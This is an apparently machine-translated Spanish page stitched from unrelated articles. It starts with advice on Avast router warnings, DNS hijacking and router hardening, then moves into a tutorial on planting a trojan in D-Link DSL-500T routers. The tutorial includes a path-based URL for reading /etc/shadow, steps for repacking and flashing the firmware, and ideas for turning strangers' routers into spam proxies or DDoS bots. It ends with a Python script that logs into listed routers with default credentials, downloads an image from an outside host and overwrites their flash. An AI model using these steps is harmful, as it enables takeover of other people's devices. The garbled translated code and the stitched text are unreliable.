¿Cambiar de proveedor ayudará contra los virus? Virus en el enrutador: DNS malicioso

¿Cambiar de proveedor ayudará contra los virus? Virus en el enrutador: DNS malicioso

Hasta hace poco, ni siquiera sabía que el enrutador Avast asusta a sus usuarios con advertencias "aterradoras" sobre sus enrutadores. Resulta que el antivirus Avast escanea los enrutadores Wi-Fi. Da como resultado que el enrutador no está configurado correctamente, el dispositivo es vulnerable a ataques o, en general, que el enrutador está infectado e infectado, y los atacantes ya han interceptado direcciones DNS y lo están redirigiendo con éxito a sitios maliciosos, robando información de tarjetas de crédito, y todo es muy malo en general. Todas estas advertencias, por supuesto, están aderezadas con un peligroso color rojo e instrucciones confusas que ni siquiera un buen especialista sin cerveza entenderá. Ni siquiera me refiero a los usuarios normales. Así es como se ven los problemas encontrados en el enrutador D-Link DIR-615:

El dispositivo es vulnerable a ataques:

La solución es, por supuesto, actualizar el firmware del enrutador. Porque, ¿qué más? Avast también puede mostrar un mensaje de que su enrutador está protegido por una contraseña débil o que el enrutador no está protegido contra piratería.

En algunos casos, es posible que vea un mensaje que tu enrutador está infectado y las conexiones se redirigen al servidor malicioso. El antivirus Avast explica esto diciendo que su enrutador fue pirateado y sus direcciones DNS fueron cambiadas por otras maliciosas. Y hay instrucciones para resolver este problema para diferentes enrutadores: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemco.

En definitiva, todas estas recomendaciones están dirigidas a comprobar las direcciones DNS y los servicios relacionados con DNS. A través del cual los atacantes pueden cambiar el DNS de su enrutador y redirigirlo a sus sitios maliciosos. Hay instrucciones detalladas sobre cómo verificar todo en enrutadores de diferentes fabricantes.

¿Cómo responder a las advertencias de Avast sobre una vulnerabilidad del enrutador?

Creo que esta pregunta interesa a todos. Especialmente si llegaste a esta página. Si se pregunta cómo reaccionaría ante este tipo de advertencias del antivirus, entonces la respuesta es simple: en absoluto. Estoy seguro de que Avast habría encontrado agujeros en mi router por los que podrían hackearme. Sólo tengo Dr.Web. Él no hace tales controles.

Tal vez me equivoque, pero ningún antivirus distinto de Avast comprueba los enrutadores Wi-Fi a los que está conectado en busca de varios tipos de vulnerabilidades. Y esta característica, llamada Seguridad de la red doméstica, apareció en 2015. En la versión Avast 2015.

Avast escanea su enrutador en busca de problemas de seguridad del dispositivo. Aunque no entiendo del todo cómo lo hace. Por ejemplo, ¿cómo verifica la misma contraseña para ingresar a la configuración del enrutador? ¿Sigue al usuario o es un método de selección? Si lo adivinas, la contraseña es incorrecta 🙂 Está bien, no soy programador.

Personalmente creo que todas estas advertencias no son más que simples recomendaciones para reforzar la seguridad de tu router. Esto no significa que alguien ya te haya hackeado y esté robando tus datos. Qué ofrece Avast:

  • Establezca una buena contraseña y actualice el firmware del enrutador. Dicen que de lo contrario te pueden hackear. Ok, esto ya está claro. Esto no tiene por qué señalarse como una especie de vulnerabilidad terrible. Aunque repito, no entiendo cómo el antivirus determina que la versión del software del enrutador está desactualizada. Me parece que esto es imposible.
  • El enrutador no está protegido contra conexiones de Internet. Lo más probable es que esta advertencia aparezca después de comprobar los puertos abiertos. Pero de forma predeterminada, la función "Acceso desde WAN" está deshabilitada en todos los enrutadores. Dudo mucho que alguien hackee su enrutador a través de Internet.
  • Bueno, lo peor es la sustitución de direcciones DNS. Si se detecta algún problema con el DNS, Avast escribe directamente: "¡Su enrutador está infectado!". Pero en el 99% de los casos esto no es así. Nuevamente, casi siempre el enrutador recibe automáticamente DNS del proveedor. Y todas las funciones y servicios a través de los cuales los atacantes pueden falsificar DNS de alguna manera están deshabilitados de forma predeterminada. Me parece que muy a menudo el antivirus malinterpreta algunas configuraciones del usuario.

Algo así. Por supuesto, es posible que no estés de acuerdo conmigo. Me parece que es mucho más fácil acceder directamente al ordenador e infectarlo que hacerlo con el router. Si hablamos de un ataque a través de Internet. Estaré encantado de ver tu opinión sobre este asunto en los comentarios.

¿Cómo proteger su enrutador y eliminar la advertencia de Avast?

Intentemos descubrir cada elemento que Avast probablemente verifica y emite advertencias.

  • El enrutador está protegido con una contraseña débil. Sin cifrado. En el primer caso, el antivirus tiene una contraseña que debes ingresar al ingresar a la configuración del enrutador. Normalmente, la contraseña predeterminada es admin. O no instalado en absoluto. Y resulta que todos los que estén conectados a su red pueden acceder a la configuración del enrutador. Por lo tanto, es necesario cambiar esta contraseña. Escribí cómo hacer esto en el artículo: . En cuanto a la contraseña de la red Wi-Fi, también debe ser segura y se debe utilizar el tipo de cifrado WPA2. Siempre escribo sobre esto en las instrucciones para configurar enrutadores.
  • El enrutador es vulnerable debido al software antiguo. Esto no es del todo cierto. Pero, si hay un nuevo firmware para su modelo de enrutador, es recomendable actualizarlo. No sólo para mejorar la seguridad, sino también para un funcionamiento más estable del dispositivo y nuevas funciones. Tenemos instrucciones en nuestro sitio web para actualizar el software de enrutadores de diferentes fabricantes. Puedes encontrarlo a través del buscador, o preguntar en los comentarios. Aquí está para.
  • Se ha cambiado la configuración de DNS. El enrutador está pirateado. Para ser honesto, nunca antes había visto casos así. Como escribí anteriormente, todos los servicios a través de los cuales esto puede suceder están deshabilitados de forma predeterminada. La mayoría de las veces, el enrutador recibe DNS del proveedor automáticamente. Lo único que puedo aconsejar es que no introduzcas manualmente direcciones DNS de las que no estés seguro. Y si especifica direcciones manualmente, es mejor usar solo DNS de Google, que: . Esto también se recomienda en las recomendaciones de Avast, que se pueden consultar en el sitio web oficial:. Hay instrucciones detalladas para resolver problemas de DNS para casi todos los enrutadores.

Eso es todo. Espero haber podido explicar al menos un poco estas advertencias en el antivirus Avast. Haga preguntas en los comentarios y no olvide compartir información útil sobre este tema. ¡Los mejores deseos!

Anteriormente, escribimos sobre la sustitución de DNS, como resultado de lo cual aparecieron anuncios y banners de ransomware en la computadora. En varios casos, los servidores DNS se cambiaron no solo en Windows, sino también en el enrutador. Para decirlo técnicamente correctamente, la sustitución de DNS no es, por supuesto, un virus en el sentido clásico de la palabra, sino una configuración maliciosa que, sin embargo, trae muchos inconvenientes.

¿Cuál es el punto de reemplazar los servidores DNS y qué daño causa?

El servidor DNS es responsable de asignar nombres de dominio a direcciones IP. Los servidores DNS fraudulentos pueden hacer coincidir el nombre de cualquier sitio web legítimo con otra dirección incorrecta y cargar contenido sustituto en lugar del real. Si registra un DNS "incorrecto" en el enrutador, entonces Todo los dispositivos conectados a él estarán en peligro.

Se parece a esto. Mientras navega por los sitios, de repente se abre una página que le pide que actualice su reproductor flash, java, instale un antivirus gratuito, descargue un programa supuestamente para acelerar y optimizar su PC, o cualquier otra cosa aparentemente inofensiva. Es importante que el nombre de un sitio familiar y confiable se muestre en la barra de direcciones. Si el usuario descarga y ejecuta el archivo propuesto, lo más probable es que en un futuro próximo comience a tener grandes problemas con su PC:

  • Su computadora puede comenzar a mostrar anuncios.
  • Los archivos pueden estar cifrados.
  • Cuando intentas abrir cualquier sitio web, puede aparecer una solicitud.
  • El escritorio puede estar bloqueado por un Winlocker, nuevamente con el requisito de transferir dinero para desbloquearlo.
  • La computadora se puede utilizar para realizar ataques de Internet a sitios web y servidores, piratear otras computadoras (botnet) y otras cosas malas.

En este caso, como regla general, el rendimiento de la PC disminuye, hay llamadas constantes al disco duro y la carga del procesador alcanza el 100% cuando está inactivo.

¿Cómo se infecta un enrutador?

Como regla general, primero se infecta uno de los ordenadores de la red local. El virus ingresa a su computadora cuando descarga un archivo de Internet. Luego envía solicitudes a direcciones estándar para equipos de red, puede escanear cookies, descargar malware auxiliar (troyano) y, como resultado, accede a la configuración del enrutador o módem ADSL.

Los virus y troyanos pueden cambiar la configuración del enrutador (en particular, cambiar el DNS) si:

1. Para iniciar sesión en la interfaz web, utilice los detalles estándar: IP, nombre de usuario y contraseña (por ejemplo, 192.168.1.1, admin/admin)

2. La dirección, el nombre de usuario y la contraseña del enrutador se guardan en el navegador.

Signos de una infección del enrutador

(pueden ocurrir todos juntos o signos individuales)

1. Aparecen anuncios en los dispositivos conectados al enrutador, las pestañas izquierdas/ventanas emergentes se abren solas en los navegadores y puede aparecer un banner de ransomware en toda la pantalla.

2. Algunos sitios no se abren. En su lugar, se muestran páginas web con contenido extraño o un error “404”.

3. No hay acceso a Internet, aunque el indicador WAN/Internet está encendido.

4. La computadora recibe una dirección IP del rango 169.254.*.*

Cómo eliminar un virus de un enrutador

Cómo proteger su enrutador de virus

1. Actualice el firmware a la última versión

Vaya al sitio web del fabricante, ingrese su modelo y descargue el firmware más reciente. Siga leyendo el ejemplo del equipo TP-Link.

2. Establezca una contraseña no estándar para la interfaz web.

No todos los enrutadores le permiten cambiar su inicio de sesión. Pero si estableces una contraseña compleja, será suficiente.

3. Denegar el acceso a la interfaz del enrutador desde Internet

4. Cambie la dirección IP del enrutador en la red local.

Ni siquiera dudes que lo primero que hará un virus ladrón de enrutadores es contactar con las direcciones más populares: 192.168.0.1 y 192.168.1.1. Por lo tanto, le recomendamos que cambie el tercer y cuarto octeto de la dirección IP local en la configuración de LAN. Especifique por ejemplo:

192.168.83.254

Después de esto, todos los dispositivos de la red recibirán IP del rango 192.168.83.*

Después de cambiar la IP local del enrutador, para ingresar a la interfaz web deberá ingresar http://[nueva dirección]

5. Instala un antivirus confiable en tu computadora

Incluso si el malware penetra en su computadora, será neutralizado y no tendrá tiempo de infectar el enrutador.

6. No guardes contraseñas en tu navegador

Creo que puedes recordar la contraseña de la interfaz web del enrutador. O al menos escríbalo en un papel.

Ante el creciente número de casos de sustitución de DNS por malware en los dispositivos de los usuarios de Internet, surge la cuestión de la seguridad de los enrutadores Wi-Fi. Cómo comprobar un enrutador en busca de virus? Cómo eliminar un virus de un enrutador? La cuestión es compleja y sencilla al mismo tiempo. ¡Hay una solución!


El virus en sí no puede grabarse en la mayoría de los enrutadores modernos debido al pequeño espacio en la memoria del enrutador, pero puede zombificar el enrutador para participar en una botnet. Por regla general, se trata de una botnet para atacar varios servidores o para redirigir y analizar el flujo de información que sale de Internet.

¡Sus contraseñas y correspondencia personal podrían caer en manos de atacantes!

Esto debe solucionarse lo más rápido posible.

  • Restablecer el enrutador
  • firmware del enrutador
  • Restablecer

Restablecer el enrutador

Puede restablecer la configuración del enrutador presionando el botón de reinicio. Normalmente, este botón se encuentra en la parte posterior del enrutador, donde están los puertos LAN. Por lo general, el botón está empotrado en un orificio para evitar presionarlo accidentalmente, por lo que es necesario utilizar un palillo. Este eliminará la configuración del enrutador modificada por el virus e instalará la configuración de fábrica en su lugar. Debo advertirte que si no sabes cómo configurar un enrutador, entonces reiniciar su configuración para ti no vale la pena!

firmware del enrutador

A veces el virus "inunda" firmware modificado al enrutador. Para eliminar el firmware de virus del enrutador, puede actualizar el enrutador nuevamente.

Conecte la computadora al enrutador con un cable LAN. Se incluye un cable LAN con cualquier enrutador. O mediante Wi-Fi si no es posible la conexión por cable. ¡Es mejor conectarse con un cable! La conexión inalámbrica se considera inestable y no es adecuada para actualizar el firmware del enrutador.

Después de conectarnos al enrutador, abra el navegador (Chrome, Opera, Mozilla, IE) e ingrese la dirección del enrutador ASUS en la barra de direcciones, para Asus es 192.168.1.1, en la página que se abre deberá ingrese su nombre de usuario y contraseña para ingresar a la configuración del enrutador. Iniciar sesión: admin, Contraseña: admin. Si el nombre de usuario y la contraseña no coinciden, pregúntele a la persona que configuró el enrutador, tal vez los haya cambiado.

Descargue el firmware del sitio web del fabricante y seleccione el firmware en el disco usando la página de configuración del enrutador. Para la gran mayoría de enrutadores, los pasos del firmware son los mismos.

¡Hola mi lector! En este artículo hablaré de fantásticos routers ADSL.
– Piezas de hierro indispensables en redes domésticas e industriales. te cuento la pregunta
explotación de estas glándulas con fines beneficiosos para nosotros: coser brutalmente
Troyano dentro del enrutador. Y de tal manera que nadie se diera cuenta
un administrador inteligente, no un usuario inteligente.

Deseos o requisitos de coeficiente intelectual

Cuando escribí este artículo, supuse que con leerlo sería suficiente.
usuario avanzado con GNU\Linux instalado, que también tenga algunas habilidades
trabajo y programación en este sistema operativo. Sin embargo, parece
Es posible repetir mis pasos en Windows (usando Cygwin, por ejemplo), pero
esto no se describirá. Para obtener el máximo placer también necesitas
Habilidades de soldador (esto es opcional).

Y todo empezó...

De alguna manera me distraí. Entonces todo empezó cuando este mismo colgó un día
pieza de hardware, o más bien, cortó traicioneramente la conexión a Internet y no
Quería restaurarlo. Al mismo tiempo, estaba lejos, físicamente accesible.
No vine a verla (sin embargo, de alguna manera estaba mintiendo, simplemente me daba pereza levantarme del sofá).
reinicie el enrutador :)), la interfaz web no respondió, pero lo recordé en
Esta cosa debería tener telnet o ssh. Ingresa al área de administración
No lo he intentado antes y imprudentemente no cambié la contraseña de mi cuenta (como
Más tarde resultó que fue en vano, porque por defecto es “admin:admin”). entonces yo
¡Probé SSH y funcionó!

$ssh [correo electrónico protegido]
$Contraseña:

¡Como un rayo caído del cielo! Caja ocupada! Nunca pensé en quién
Resulta que este enrutador está controlado: ¡GNU/Linux! me sentí aterrorizado
Me pregunto cómo funciona todo aquí y, mentalmente, gracias a la pereza y al azar,
entró en la investigación.

Recopilación de información

Entonces, ¿por dónde comencé? Por supuesto, de la lista de comandos disponibles:

#cajaocupada
...
Funciones actualmente definidas:
[, ash, togetherbox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, nombre de host, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, montar, mv, contraseña, ping, ps, pwd, reiniciar, rm, rmmod, ruta, sh, dormir,
sincronizar, alquitrán, prueba, tftp, toque, cierto, tty, desmontar, wget, whoami, sí

El conjunto es bastante razonable, suficiente para la investigación normal y la implementación de ideas.
A continuación, se despertó el interés por la versión del kernel:

# gato /proc/versión
Linux versión 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc versión 2.95.3
20010315 (lanzamiento/MontaVista)) #1 Jueves 28 de diciembre 05:45:00 CST 2006

Como referencia: MontaVista es una distribución dirigida a dispositivos integrados.
sistemas. La gran mayoría de los fabricantes de equipos de red proporcionan
preferencia por este sistema. También se puede encontrar en otros dispositivos, por ejemplo, en
libros electrónicos o teléfonos móviles.

# gato /etc/versiones
CLIENTE=DLinkRU
MODELO=DSL-500T
VERSIÓN=V3.02B01T01.RU.20061228
HTML_LANG=ES.302
TABLERO=AR7VW
VERSIÓN_ID=
CPUARCH_NAME=AR7
MODELO_ID=
FSSTAMP=20061228055253

# gato /proc/cpuinfo
procesador
: 0
modelo de CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
espere instrucción: no
temporizadores de microsegundos: sí
vector de interrupción adicional: sí
punto de vigilancia de hardware: sí
Excepciones VCED: no disponible
Excepciones VCEI: no disponible

AR7 es un chip de doble núcleo desarrollado por Texas Instruments. Él
contiene un enrutador ADSL completo en un solo chip que admite los estándares ADSL1,
ADSL2,ADSL2+. Basado en procesador RISC de alto rendimiento MIPS 4KEc, con
frecuencia de reloj 175 o 233 (dependiendo de la tecnología de producción: 18 micrones
o 13 µm). El chip contiene 2 interfaces UART a bordo, una de las cuales (UART_A)
se utiliza para generar información de depuración, así como una interfaz EJTAG que sirve
para depurar (firmware) la memoria Flash. Se discutirá el uso de estas interfaces.
se describe a continuación.

Finalmente, miré la información de la memoria:

# gato /proc/montajes
/dev/mtdblock/0/squashfs ro 0 0
ninguno /dev devfs rw 0 0
proceso /procproc rw 0 0
ramfs /var ramfs rw 0 0

# gato /proc/mtd
dev: tamaño borrar tamaño nombre
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Por supuesto, sin olvidarnos de las direcciones de bloque:

# gato /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

De lo anterior se deduce que la memoria Flash (/dev/mtdblock) tiene 5 bloques:

mtd0– imagen del sistema de archivos SquashFs. Este es un archivo especial
un sistema comprimido y de sólo lectura. Para
Se utiliza el algoritmo de compresión gzip, pero en este caso - LZMA (relación de compresión
más alto). El tamaño de este bloque es de 4 MB.

mtd1– este bloque contiene el núcleo de MontaVista comprimido con el algoritmo LZMA
condición, tamaño de bloque 600 KB.

mtd2– Bootloader ADAM2, carga el kernel, también tiene
Servicio de servidor FTP para recuperación y flasheo. Habrá más detalles al respecto.
declarado además. El tamaño del bloque es de 64 KB.

mtd3– dividido entre datos de configuración y entorno
(variables de entorno), que puede consultar en /proc/ticfg/env.
Los datos de configuración se encuentran en /etc/config.xml. Intermediario entre archivos
sistema, el bloque de configuración está cerrado (como todos los cm_*, control, o
ellos más tarde) programa cm_logic. El tamaño de este bloque también es de 64 KB.

mtd4– contiene la firma del firmware, el kernel y la imagen del archivo
sistemas. Este bloque se utiliza al actualizar el firmware a través de la interfaz web.
Inicialmente se almacena en este bloque, luego se verifica la suma de verificación
y, si encaja, se apunta a su nuevo lugar.

RAM (16 MB en este modelo, pero ADAM2 en este modelo
ve sólo 14 MB, se soluciona actualizando), montado en el directorio /var, y su
Puede usarlo fácilmente para nuestros propósitos:

# gratis
total de buffers compartidos gratuitos utilizados
Memoria: 14276 10452 3824 0

No olvidemos repasar la lista de procesos. De los interesantes que acechan aquí
demonios: thttpd - servidor web; dproxy: servidor proxy que almacena en caché las solicitudes DNS; ddnsd
- demonio DNS; pppd... es el demonio real que implementa la conexión a través del protocolo
PPP, y en los parámetros vemos información de la cuenta. Entonces, si el enrutador no está
pretende ser una manguera (léase, no en modo puente), entonces puede
Facilidad para obtener una cuenta.

Los programas cm_* están cerrados y el código fuente ya incluye
compilado (estos programas también son desarrollados por Texas Instruments, en D-Link
No tiene sentido pelear por el incumplimiento de las licencias).

cm_logica– un programa que controla la lógica del sistema, a través de él
la configuración está en progreso; sincroniza /etc/config.xml con
parte correspondiente del contenido de /dev/ticfg (apuntando a mtd3).

cm_cli– interfaz de línea de comando para gestión y configuración
sistemas. Por ejemplo, la configuración de la conexión se realiza a través de esta interfaz.

cm_pc– lanza y monitorea procesos, conexiones con reglas
(por ejemplo, ejecute el programa como un demonio; las reglas también incluyen información sobre
puertos abiertos) descritos en /etc/progdefs.xml; se carga inmediatamente después
granos.

webcm– Interfaz CGI, con fugas, por ejemplo le permite mirar /etc/shadow,
simplemente accediendo a la URL.

http://192.168.1.1/../../../etc/shadow

No obtuve nada, thttpd no es tan simple, pero si es así:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Otra cosa. Esto se puede utilizar para recopilar información si no hay acceso a
ssh/telnet, pero hay acceso a la interfaz web.

firmwarecfg– se utiliza para actualizar el firmware a través de la interfaz web. en la entrada
de este programa, se transfiere una imagen con una solicitud POST desde la interfaz web, y ya
redirige a la memoria Flash después de verificar primero la suma de verificación de la imagen.

En este punto, se completa la recopilación de información primaria, es hora de pasar a la fase decisiva.
comportamiento.

Instalación de herramientas de desarrollo y compilación de firmware.

Firmware para enrutadores D-Link (y todos los demás basados ​​en GNU/Linux)
distribuidos bajo la licencia GPL, puedes conseguirlos en el sitio oficial
Servidor FTP. De hecho, puede elegir cualquiera de la lista de firmwares propuestos,
son iguales (con respecto a la serie T). La entrega incluye el código fuente del kernel, el entorno,
Herramientas y cadena de herramientas necesarias para desarrollar/compilar las existentes.
programas. Debe descomprimirse en la raíz y agregarse a la variable de entorno.
PATH ruta al directorio bin de la cadena de herramientas:

$ tar xvf herramientas.tgz
$ exportar RUTA=$RUTA:/opt/

Ahora, para compilar su propio firmware, vaya al directorio
con los códigos fuente y ejecute esta misma marca.

$ cd DSL/TYLinuxV3/src && marca

Habrá muchas preguntas sobre cómo habilitar la compatibilidad con dispositivos (mejor
responderlas positivamente). Una vez completada la compilación, en el directorio TYLinuxV3/images
Se crearán imágenes de firmware. También puedes ejecutar un script con el mismo nombre que el tuyo.
modelo del directorio /TYLinuxV3/src/scripts.

Algunas palabras sobre la transferencia de archivos entre el enrutador y la computadora. El primero
el método que utilicé es la capacidad de transferir archivos a través del protocolo SSH,
usando el programa scp para esto. Pero un poco más tarde descubrí que mc (Midnight
Commander) también tiene la capacidad de conectarse a través de SSH (Panel -> Conexión Shell).
Alternativamente, puede configurar un servidor web o FTP en su lugar de trabajo. Más tarde yo
Le di preferencia al servidor web porque es el que funciona más rápido. lo instalé
thttpd, pequeño y rápido, como en un enrutador. Lo lanzamos en casa y lo descargamos a
archivo del enrutador, después de ir al directorio /var (como se mencionó
anteriormente, disponible para grabación).

$ thttpd -g -d ~/ForRouter -u usuario -p 8080
#cd/var
# wget http://192.168.1.2/archivo

Para descargar un archivo desde el enrutador, también puede abrir el servidor web:

# thttpd -g -d /var -u raíz -p 8080

Tenga en cuenta que si desea descargar un archivo ejecutable desde el enrutador, debe
eliminar los derechos de lanzamiento. Al descargar una gran cantidad de archivos desde el enrutador
Es mejor usar mc, no necesitarás copiar archivos a /var primero y
elimine los derechos y luego elimine estos archivos para liberar espacio. En general, el asunto
gusto, elija cualquier opción que sea conveniente para usted.

Creando tu propio programa

Comencemos, por supuesto, con un clásico de la programación: HelloWorld. algunos especiales
no hay reglas. El texto del programa resulta dolorosamente familiar:

#incluir
#incluir

int principal (vacío)
{
printf("Compañero.Alimentar.Matar.Repetir.");
devolver 0;
}

Compilando (la ruta a la cadena de herramientas debe especificarse en la variable de entorno
CAMINO):

$ mips_fp_le-gcc infierno.c -o infierno
$ mips_fp_le-strip -s infierno

#cd/var
# chmod +x infierno
# ./infierno

Y… no pasará nada, o aparecerá la notificación de ruta no encontrada. Qué es
¿caso? Ya he hablado de cm_pc: este programa lanza otros en
de acuerdo con las reglas descritas en /etc/progdefs.xml. Ahora ha llegado el momento
modificar y flashear imágenes del sistema de archivos.

Modificación del sistema de archivos

Para modificar el sistema de archivos, primero debe
deshacer. Como ya mencioné, el sistema de archivos aquí es SquashFs con el parche LZMA.
El paquete de desarrollo de firmware incluye solo el programa mksquashfs (para crear
imagen), falta unsquashfs (para descomprimir). Pero no importa, todo está disponible.
en el sitio web del sistema de archivos, necesitamos la primera versión. Aplicando el parche LZMA y
Una vez recogidas las utilidades, las dejamos a un lado en un lugar conveniente. Primero obtenemos la imagen.
sistema de archivos del enrutador:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir desempaquetado_fs
$ unsquashfs fs.img unpacked_fs

Ahora puedes modificarlo como quieras y enviarnos FuckTheWorld a
directorio /bin y agregue una regla para ejecutar en /etc/progdefs.xml.

$ cp hola unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Y agregamos esto (entre las etiquetas ):

infierno
/bin/infierno

Guarde y empaquete de nuevo:

$ mksquashfs unpacked_fs my_fs.img -noappend

Tenga en cuenta que la imagen del sistema de archivos no debe exceder
Tamaños aceptables. Si sientes la necesidad de intentar algo con urgencia y no es así
encaja, elimine todo lo "innecesario" de la imagen como grep, whoami o
Utilice el empaquetador de archivos ejecutables UPX. Ahora descárgalo al enrutador.
imagen y pase a la siguiente sección.

Grabar una imagen del sistema de archivos

El método para flashear un enrutador es muy sencillo: implica acceder al dispositivo;
/dev/mtdblock/*. Por lo tanto, cargue la imagen del archivo en el enrutador de la forma que más le convenga.
sistema y realice esta simple acción:

# cat my_fs.img > /dev/mtdblock/0 && reiniciar

# cp my_fs.img /dev/mtdblock/0 && reiniciar

Después de un tiempo, cuando se complete el proceso de grabación, el enrutador se reiniciará y
los cambios entrarán en vigor. Intentemos ejecutar nuestro ejemplo:

# infierno
Mate.Alimentar.Matar.Repetir.

Métodos de recuperación en caso de fallo.

Antes de actualizar su enrutador con "manualidades" más serias, debe averiguar cómo
actuar en casos críticos cuando el enrutador se niega
carga. No hay situaciones desesperadas. El servidor FTP ADAM2 viene al rescate. Para
Primero, debes iniciar un cliente FTP en la dirección IP de ADAM2, que puedes espiar.
en /proc/ticfg/env (parámetro my_ipaddress).

$ftp 192.168.1.199
Servidor FTP 220 ADAM2 listo.
530 Por favor inicie sesión con USUARIO y PASA.

Para mayor claridad, puede activar el modo de depuración y luego todo
información y todas las respuestas FTP:

Inicio de sesión/contraseña: adam2/adam2. El proceso de flasheo es muy sencillo. Para empezar
cambie la sesión FTP al modo binario:

ftp> cita MEDIOS FLSH

Ahora enviamos, por ejemplo, una imagen del sistema de archivos e indicamos la ubicación
destinos:

ftp>poner fs.img "fs.img mtd0"

Esperamos el final de la grabación, reiniciamos el enrutador, salimos de la sesión:

ftp> cita REINICIAR
ftp> salir

¡Todo! Como puedes ver no hay nada complicado, ahora si algo sale mal,
siempre puedes arreglar la situación.

Para facilitar su uso, debe proporcionar una dirección IP normal, habilitar
carga automática (para no bailar con el reinicio) y aumentar ligeramente el tiempo
esperando conexión antes de cargar el kernel. Todos estos parámetros se almacenan en
variables de entorno, existen comandos FTP ADAM2 especiales: GETENV y SETENV (para
obtener y establecer la variable respectivamente). En la sesión FTP ingrese lo siguiente
comandos:

ftp> carga automática SETENV, 1
ftp>SETENV autoload_timeout,8
ftp>SETENV mi_direcciónip,192.168.1.1
ftp> cita REINICIAR
ftp> salir

El enrutador se reinicia y podrá acceder a ADAM2 en 192.168.1.1:21. Si
habrá un deseo de actualizar la imagen del kernel, y el kernel se negará a arrancar, FTP
comenzará por sí solo. Antes de mostrar imágenes modificadas, asegúrese de
guarde los actuales para su restauración. En general, puede cambiar las variables de entorno.
y vía /proc/ticfg/env, sólo quería contarles más sobre cómo trabajar con FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

Puedes comprobar los cambios así:

# gato /proc/ticfg/env | grep mi dirección IP

Qué hacer si desea intentar actualizar el gestor de arranque y cómo
¿Qué hacer en caso de falla? O el enrutador por alguna razón no se inicia y
¿Sin acceso a ADAM2? Hay una solución: JTAG, o mejor dicho, este chip contiene EJTAG
(versión extendida). Esta es una interfaz para la depuración/programación en circuito.

Para conectarnos a esta interfaz necesitamos un puerto LPT de computadora,
Conectores y 4 resistencias. El esquema es simple.

Me apresuro a señalar que el firmware a través de JTAG no es una tarea rápida, llevará bastante tiempo
mucho tiempo. Por lo tanto, solo debe usarse para restaurar el gestor de arranque,
incluso si no funciona. Para comunicarse a través de JTAG, debe utilizar un especial
programa, por ejemplo UrJTAG. A continuación se muestra un ejemplo de cómo funciona esta interfaz.
Configuración de conexión:

jtag> cable paralelo 0x378 DLC5
jtag> detectar

Detección de memoria flash:

jtag> detectar flash 0x30000000 1

Lectura de memoria flash:

jtag> léame 0x30000000 0x400000 fullflash.img

Escribir en la memoria (cargador de arranque):

jtag> flashmem 0x30000000 adam2.img

También es útil saber sobre la interfaz UART (anteriormente prometí hablar de ello). EN
UART_A informa, es decir, registra el gestor de arranque (en una etapa temprana del arranque desde
puedes comunicarte con él) y el núcleo. Al escribir kernels modificados esto
indispensable para la depuración. UART - Receptor/Transmisor Asíncrono Universal
(transceptor asíncrono universal) casi siempre está presente en
microcontroladores.

El circuito adaptador es muy sencillo. Basado en un solo chip.
Convertidor de nivel TTL: MAX232 para COM y FT232R para USB. microcircuitos
Son bastante comunes y no habrá problemas con la compra.

El circuito se ensambla en una placa (que se puede colocar fácilmente en una caja).
Conector de puerto COM) en 20 minutos y aporta muchos beneficios. Por ejemplo, al depurar
Los núcleos son una solución absolutamente insustituible. ¿Qué pasa si la electrónica es un problema? Salida
Son cables USB para teléfonos antiguos, solo tienen un conversor.
UART-USB.

Algunas ideas de distribución

Tener tu propio proxy/sox en el enrutador de otra persona es fantástico. Al igual que el spam
enrutador para todos los protocolos. Esta no es una computadora con Windows, lo cual
reorganizado cada mes :). Los enrutadores a menudo no se cambian ni se actualizan. si y
¿A quién más además de nosotros se le ocurriría siquiera la idea de infectar un router?

No olvide que tenemos control sobre todo el tráfico del usuario/red. Para más
En enrutadores potentes ya es posible colgar un bot DDOS. Ocultar archivo/ocultar proceso,
interceptar la escritura en bloques mtd sin sobrescribir nuestro programa, todo eso
¡lo que sea!

Digamos que está a punto de empezar a escribir un programa serio para un enrutador.
Es importante realizar una muy buena depuración, probablemente tendrás que hacerlo varias veces.
reescribir/restaurar imágenes... Esta es una perspectiva muy triste. Incluso las manos
baja un poco, si además tienes en cuenta que el recurso de reescritura de la memoria Flash
es pequeño (más detalles en la documentación del chip de memoria) y existe la posibilidad
arruinarla. ¡Pero hay una salida! ¡Qemu puede emular AR7! ¿Te imaginas lo que
¿Ofrece oportunidades y comodidades ilimitadas? Ahora nada nos detiene
¡Escribe algo increíblemente genial!

Entonces. Escribiste un programa, lo probaste en tu propio enrutador o en uno o dos enrutadores de otras personas, pero
toda la red todavía está por delante, infectarla manualmente es una tarea ardua, en el décimo enrutador ya comienzas
Maldice al mundo entero, y los hilos de "cat" y "mtd" flotan en tus ojos. escribamos
un programa para automatizar estas acciones rutinarias. Elegí el lenguaje Python.

El plan de trabajo es el siguiente:

  • compilar una lista de enrutadores, por ejemplo, usando nmap;
  • el script debe tomar las direcciones IP de la lista en orden, ingresar a través de
    telnet con inicio de sesión/contraseña estándar;
  • luego los mismos pasos: subir la imagen modificada,
    reescribir, reiniciar.

#!/usr/bin/env pitón
#Codificar=UTF-8

importar telnetlib, hora

SERVIDOR="http://anyhost.com/fs.image"

para dirección en open("iplist.txt"):
telnet = telnetlib.Telnet(dirección)
telnet.set_debuglevel(1)
telnet.read_until("iniciar sesión:")
tiempo.dormir(5)
telnet.write("admin\n")
telnet.read_until("Contraseña:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVIDOR)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reiniciar")
telnet.cerrar()

La lógica del guión dista mucho de ser ideal, ahora explicaré por qué. Para
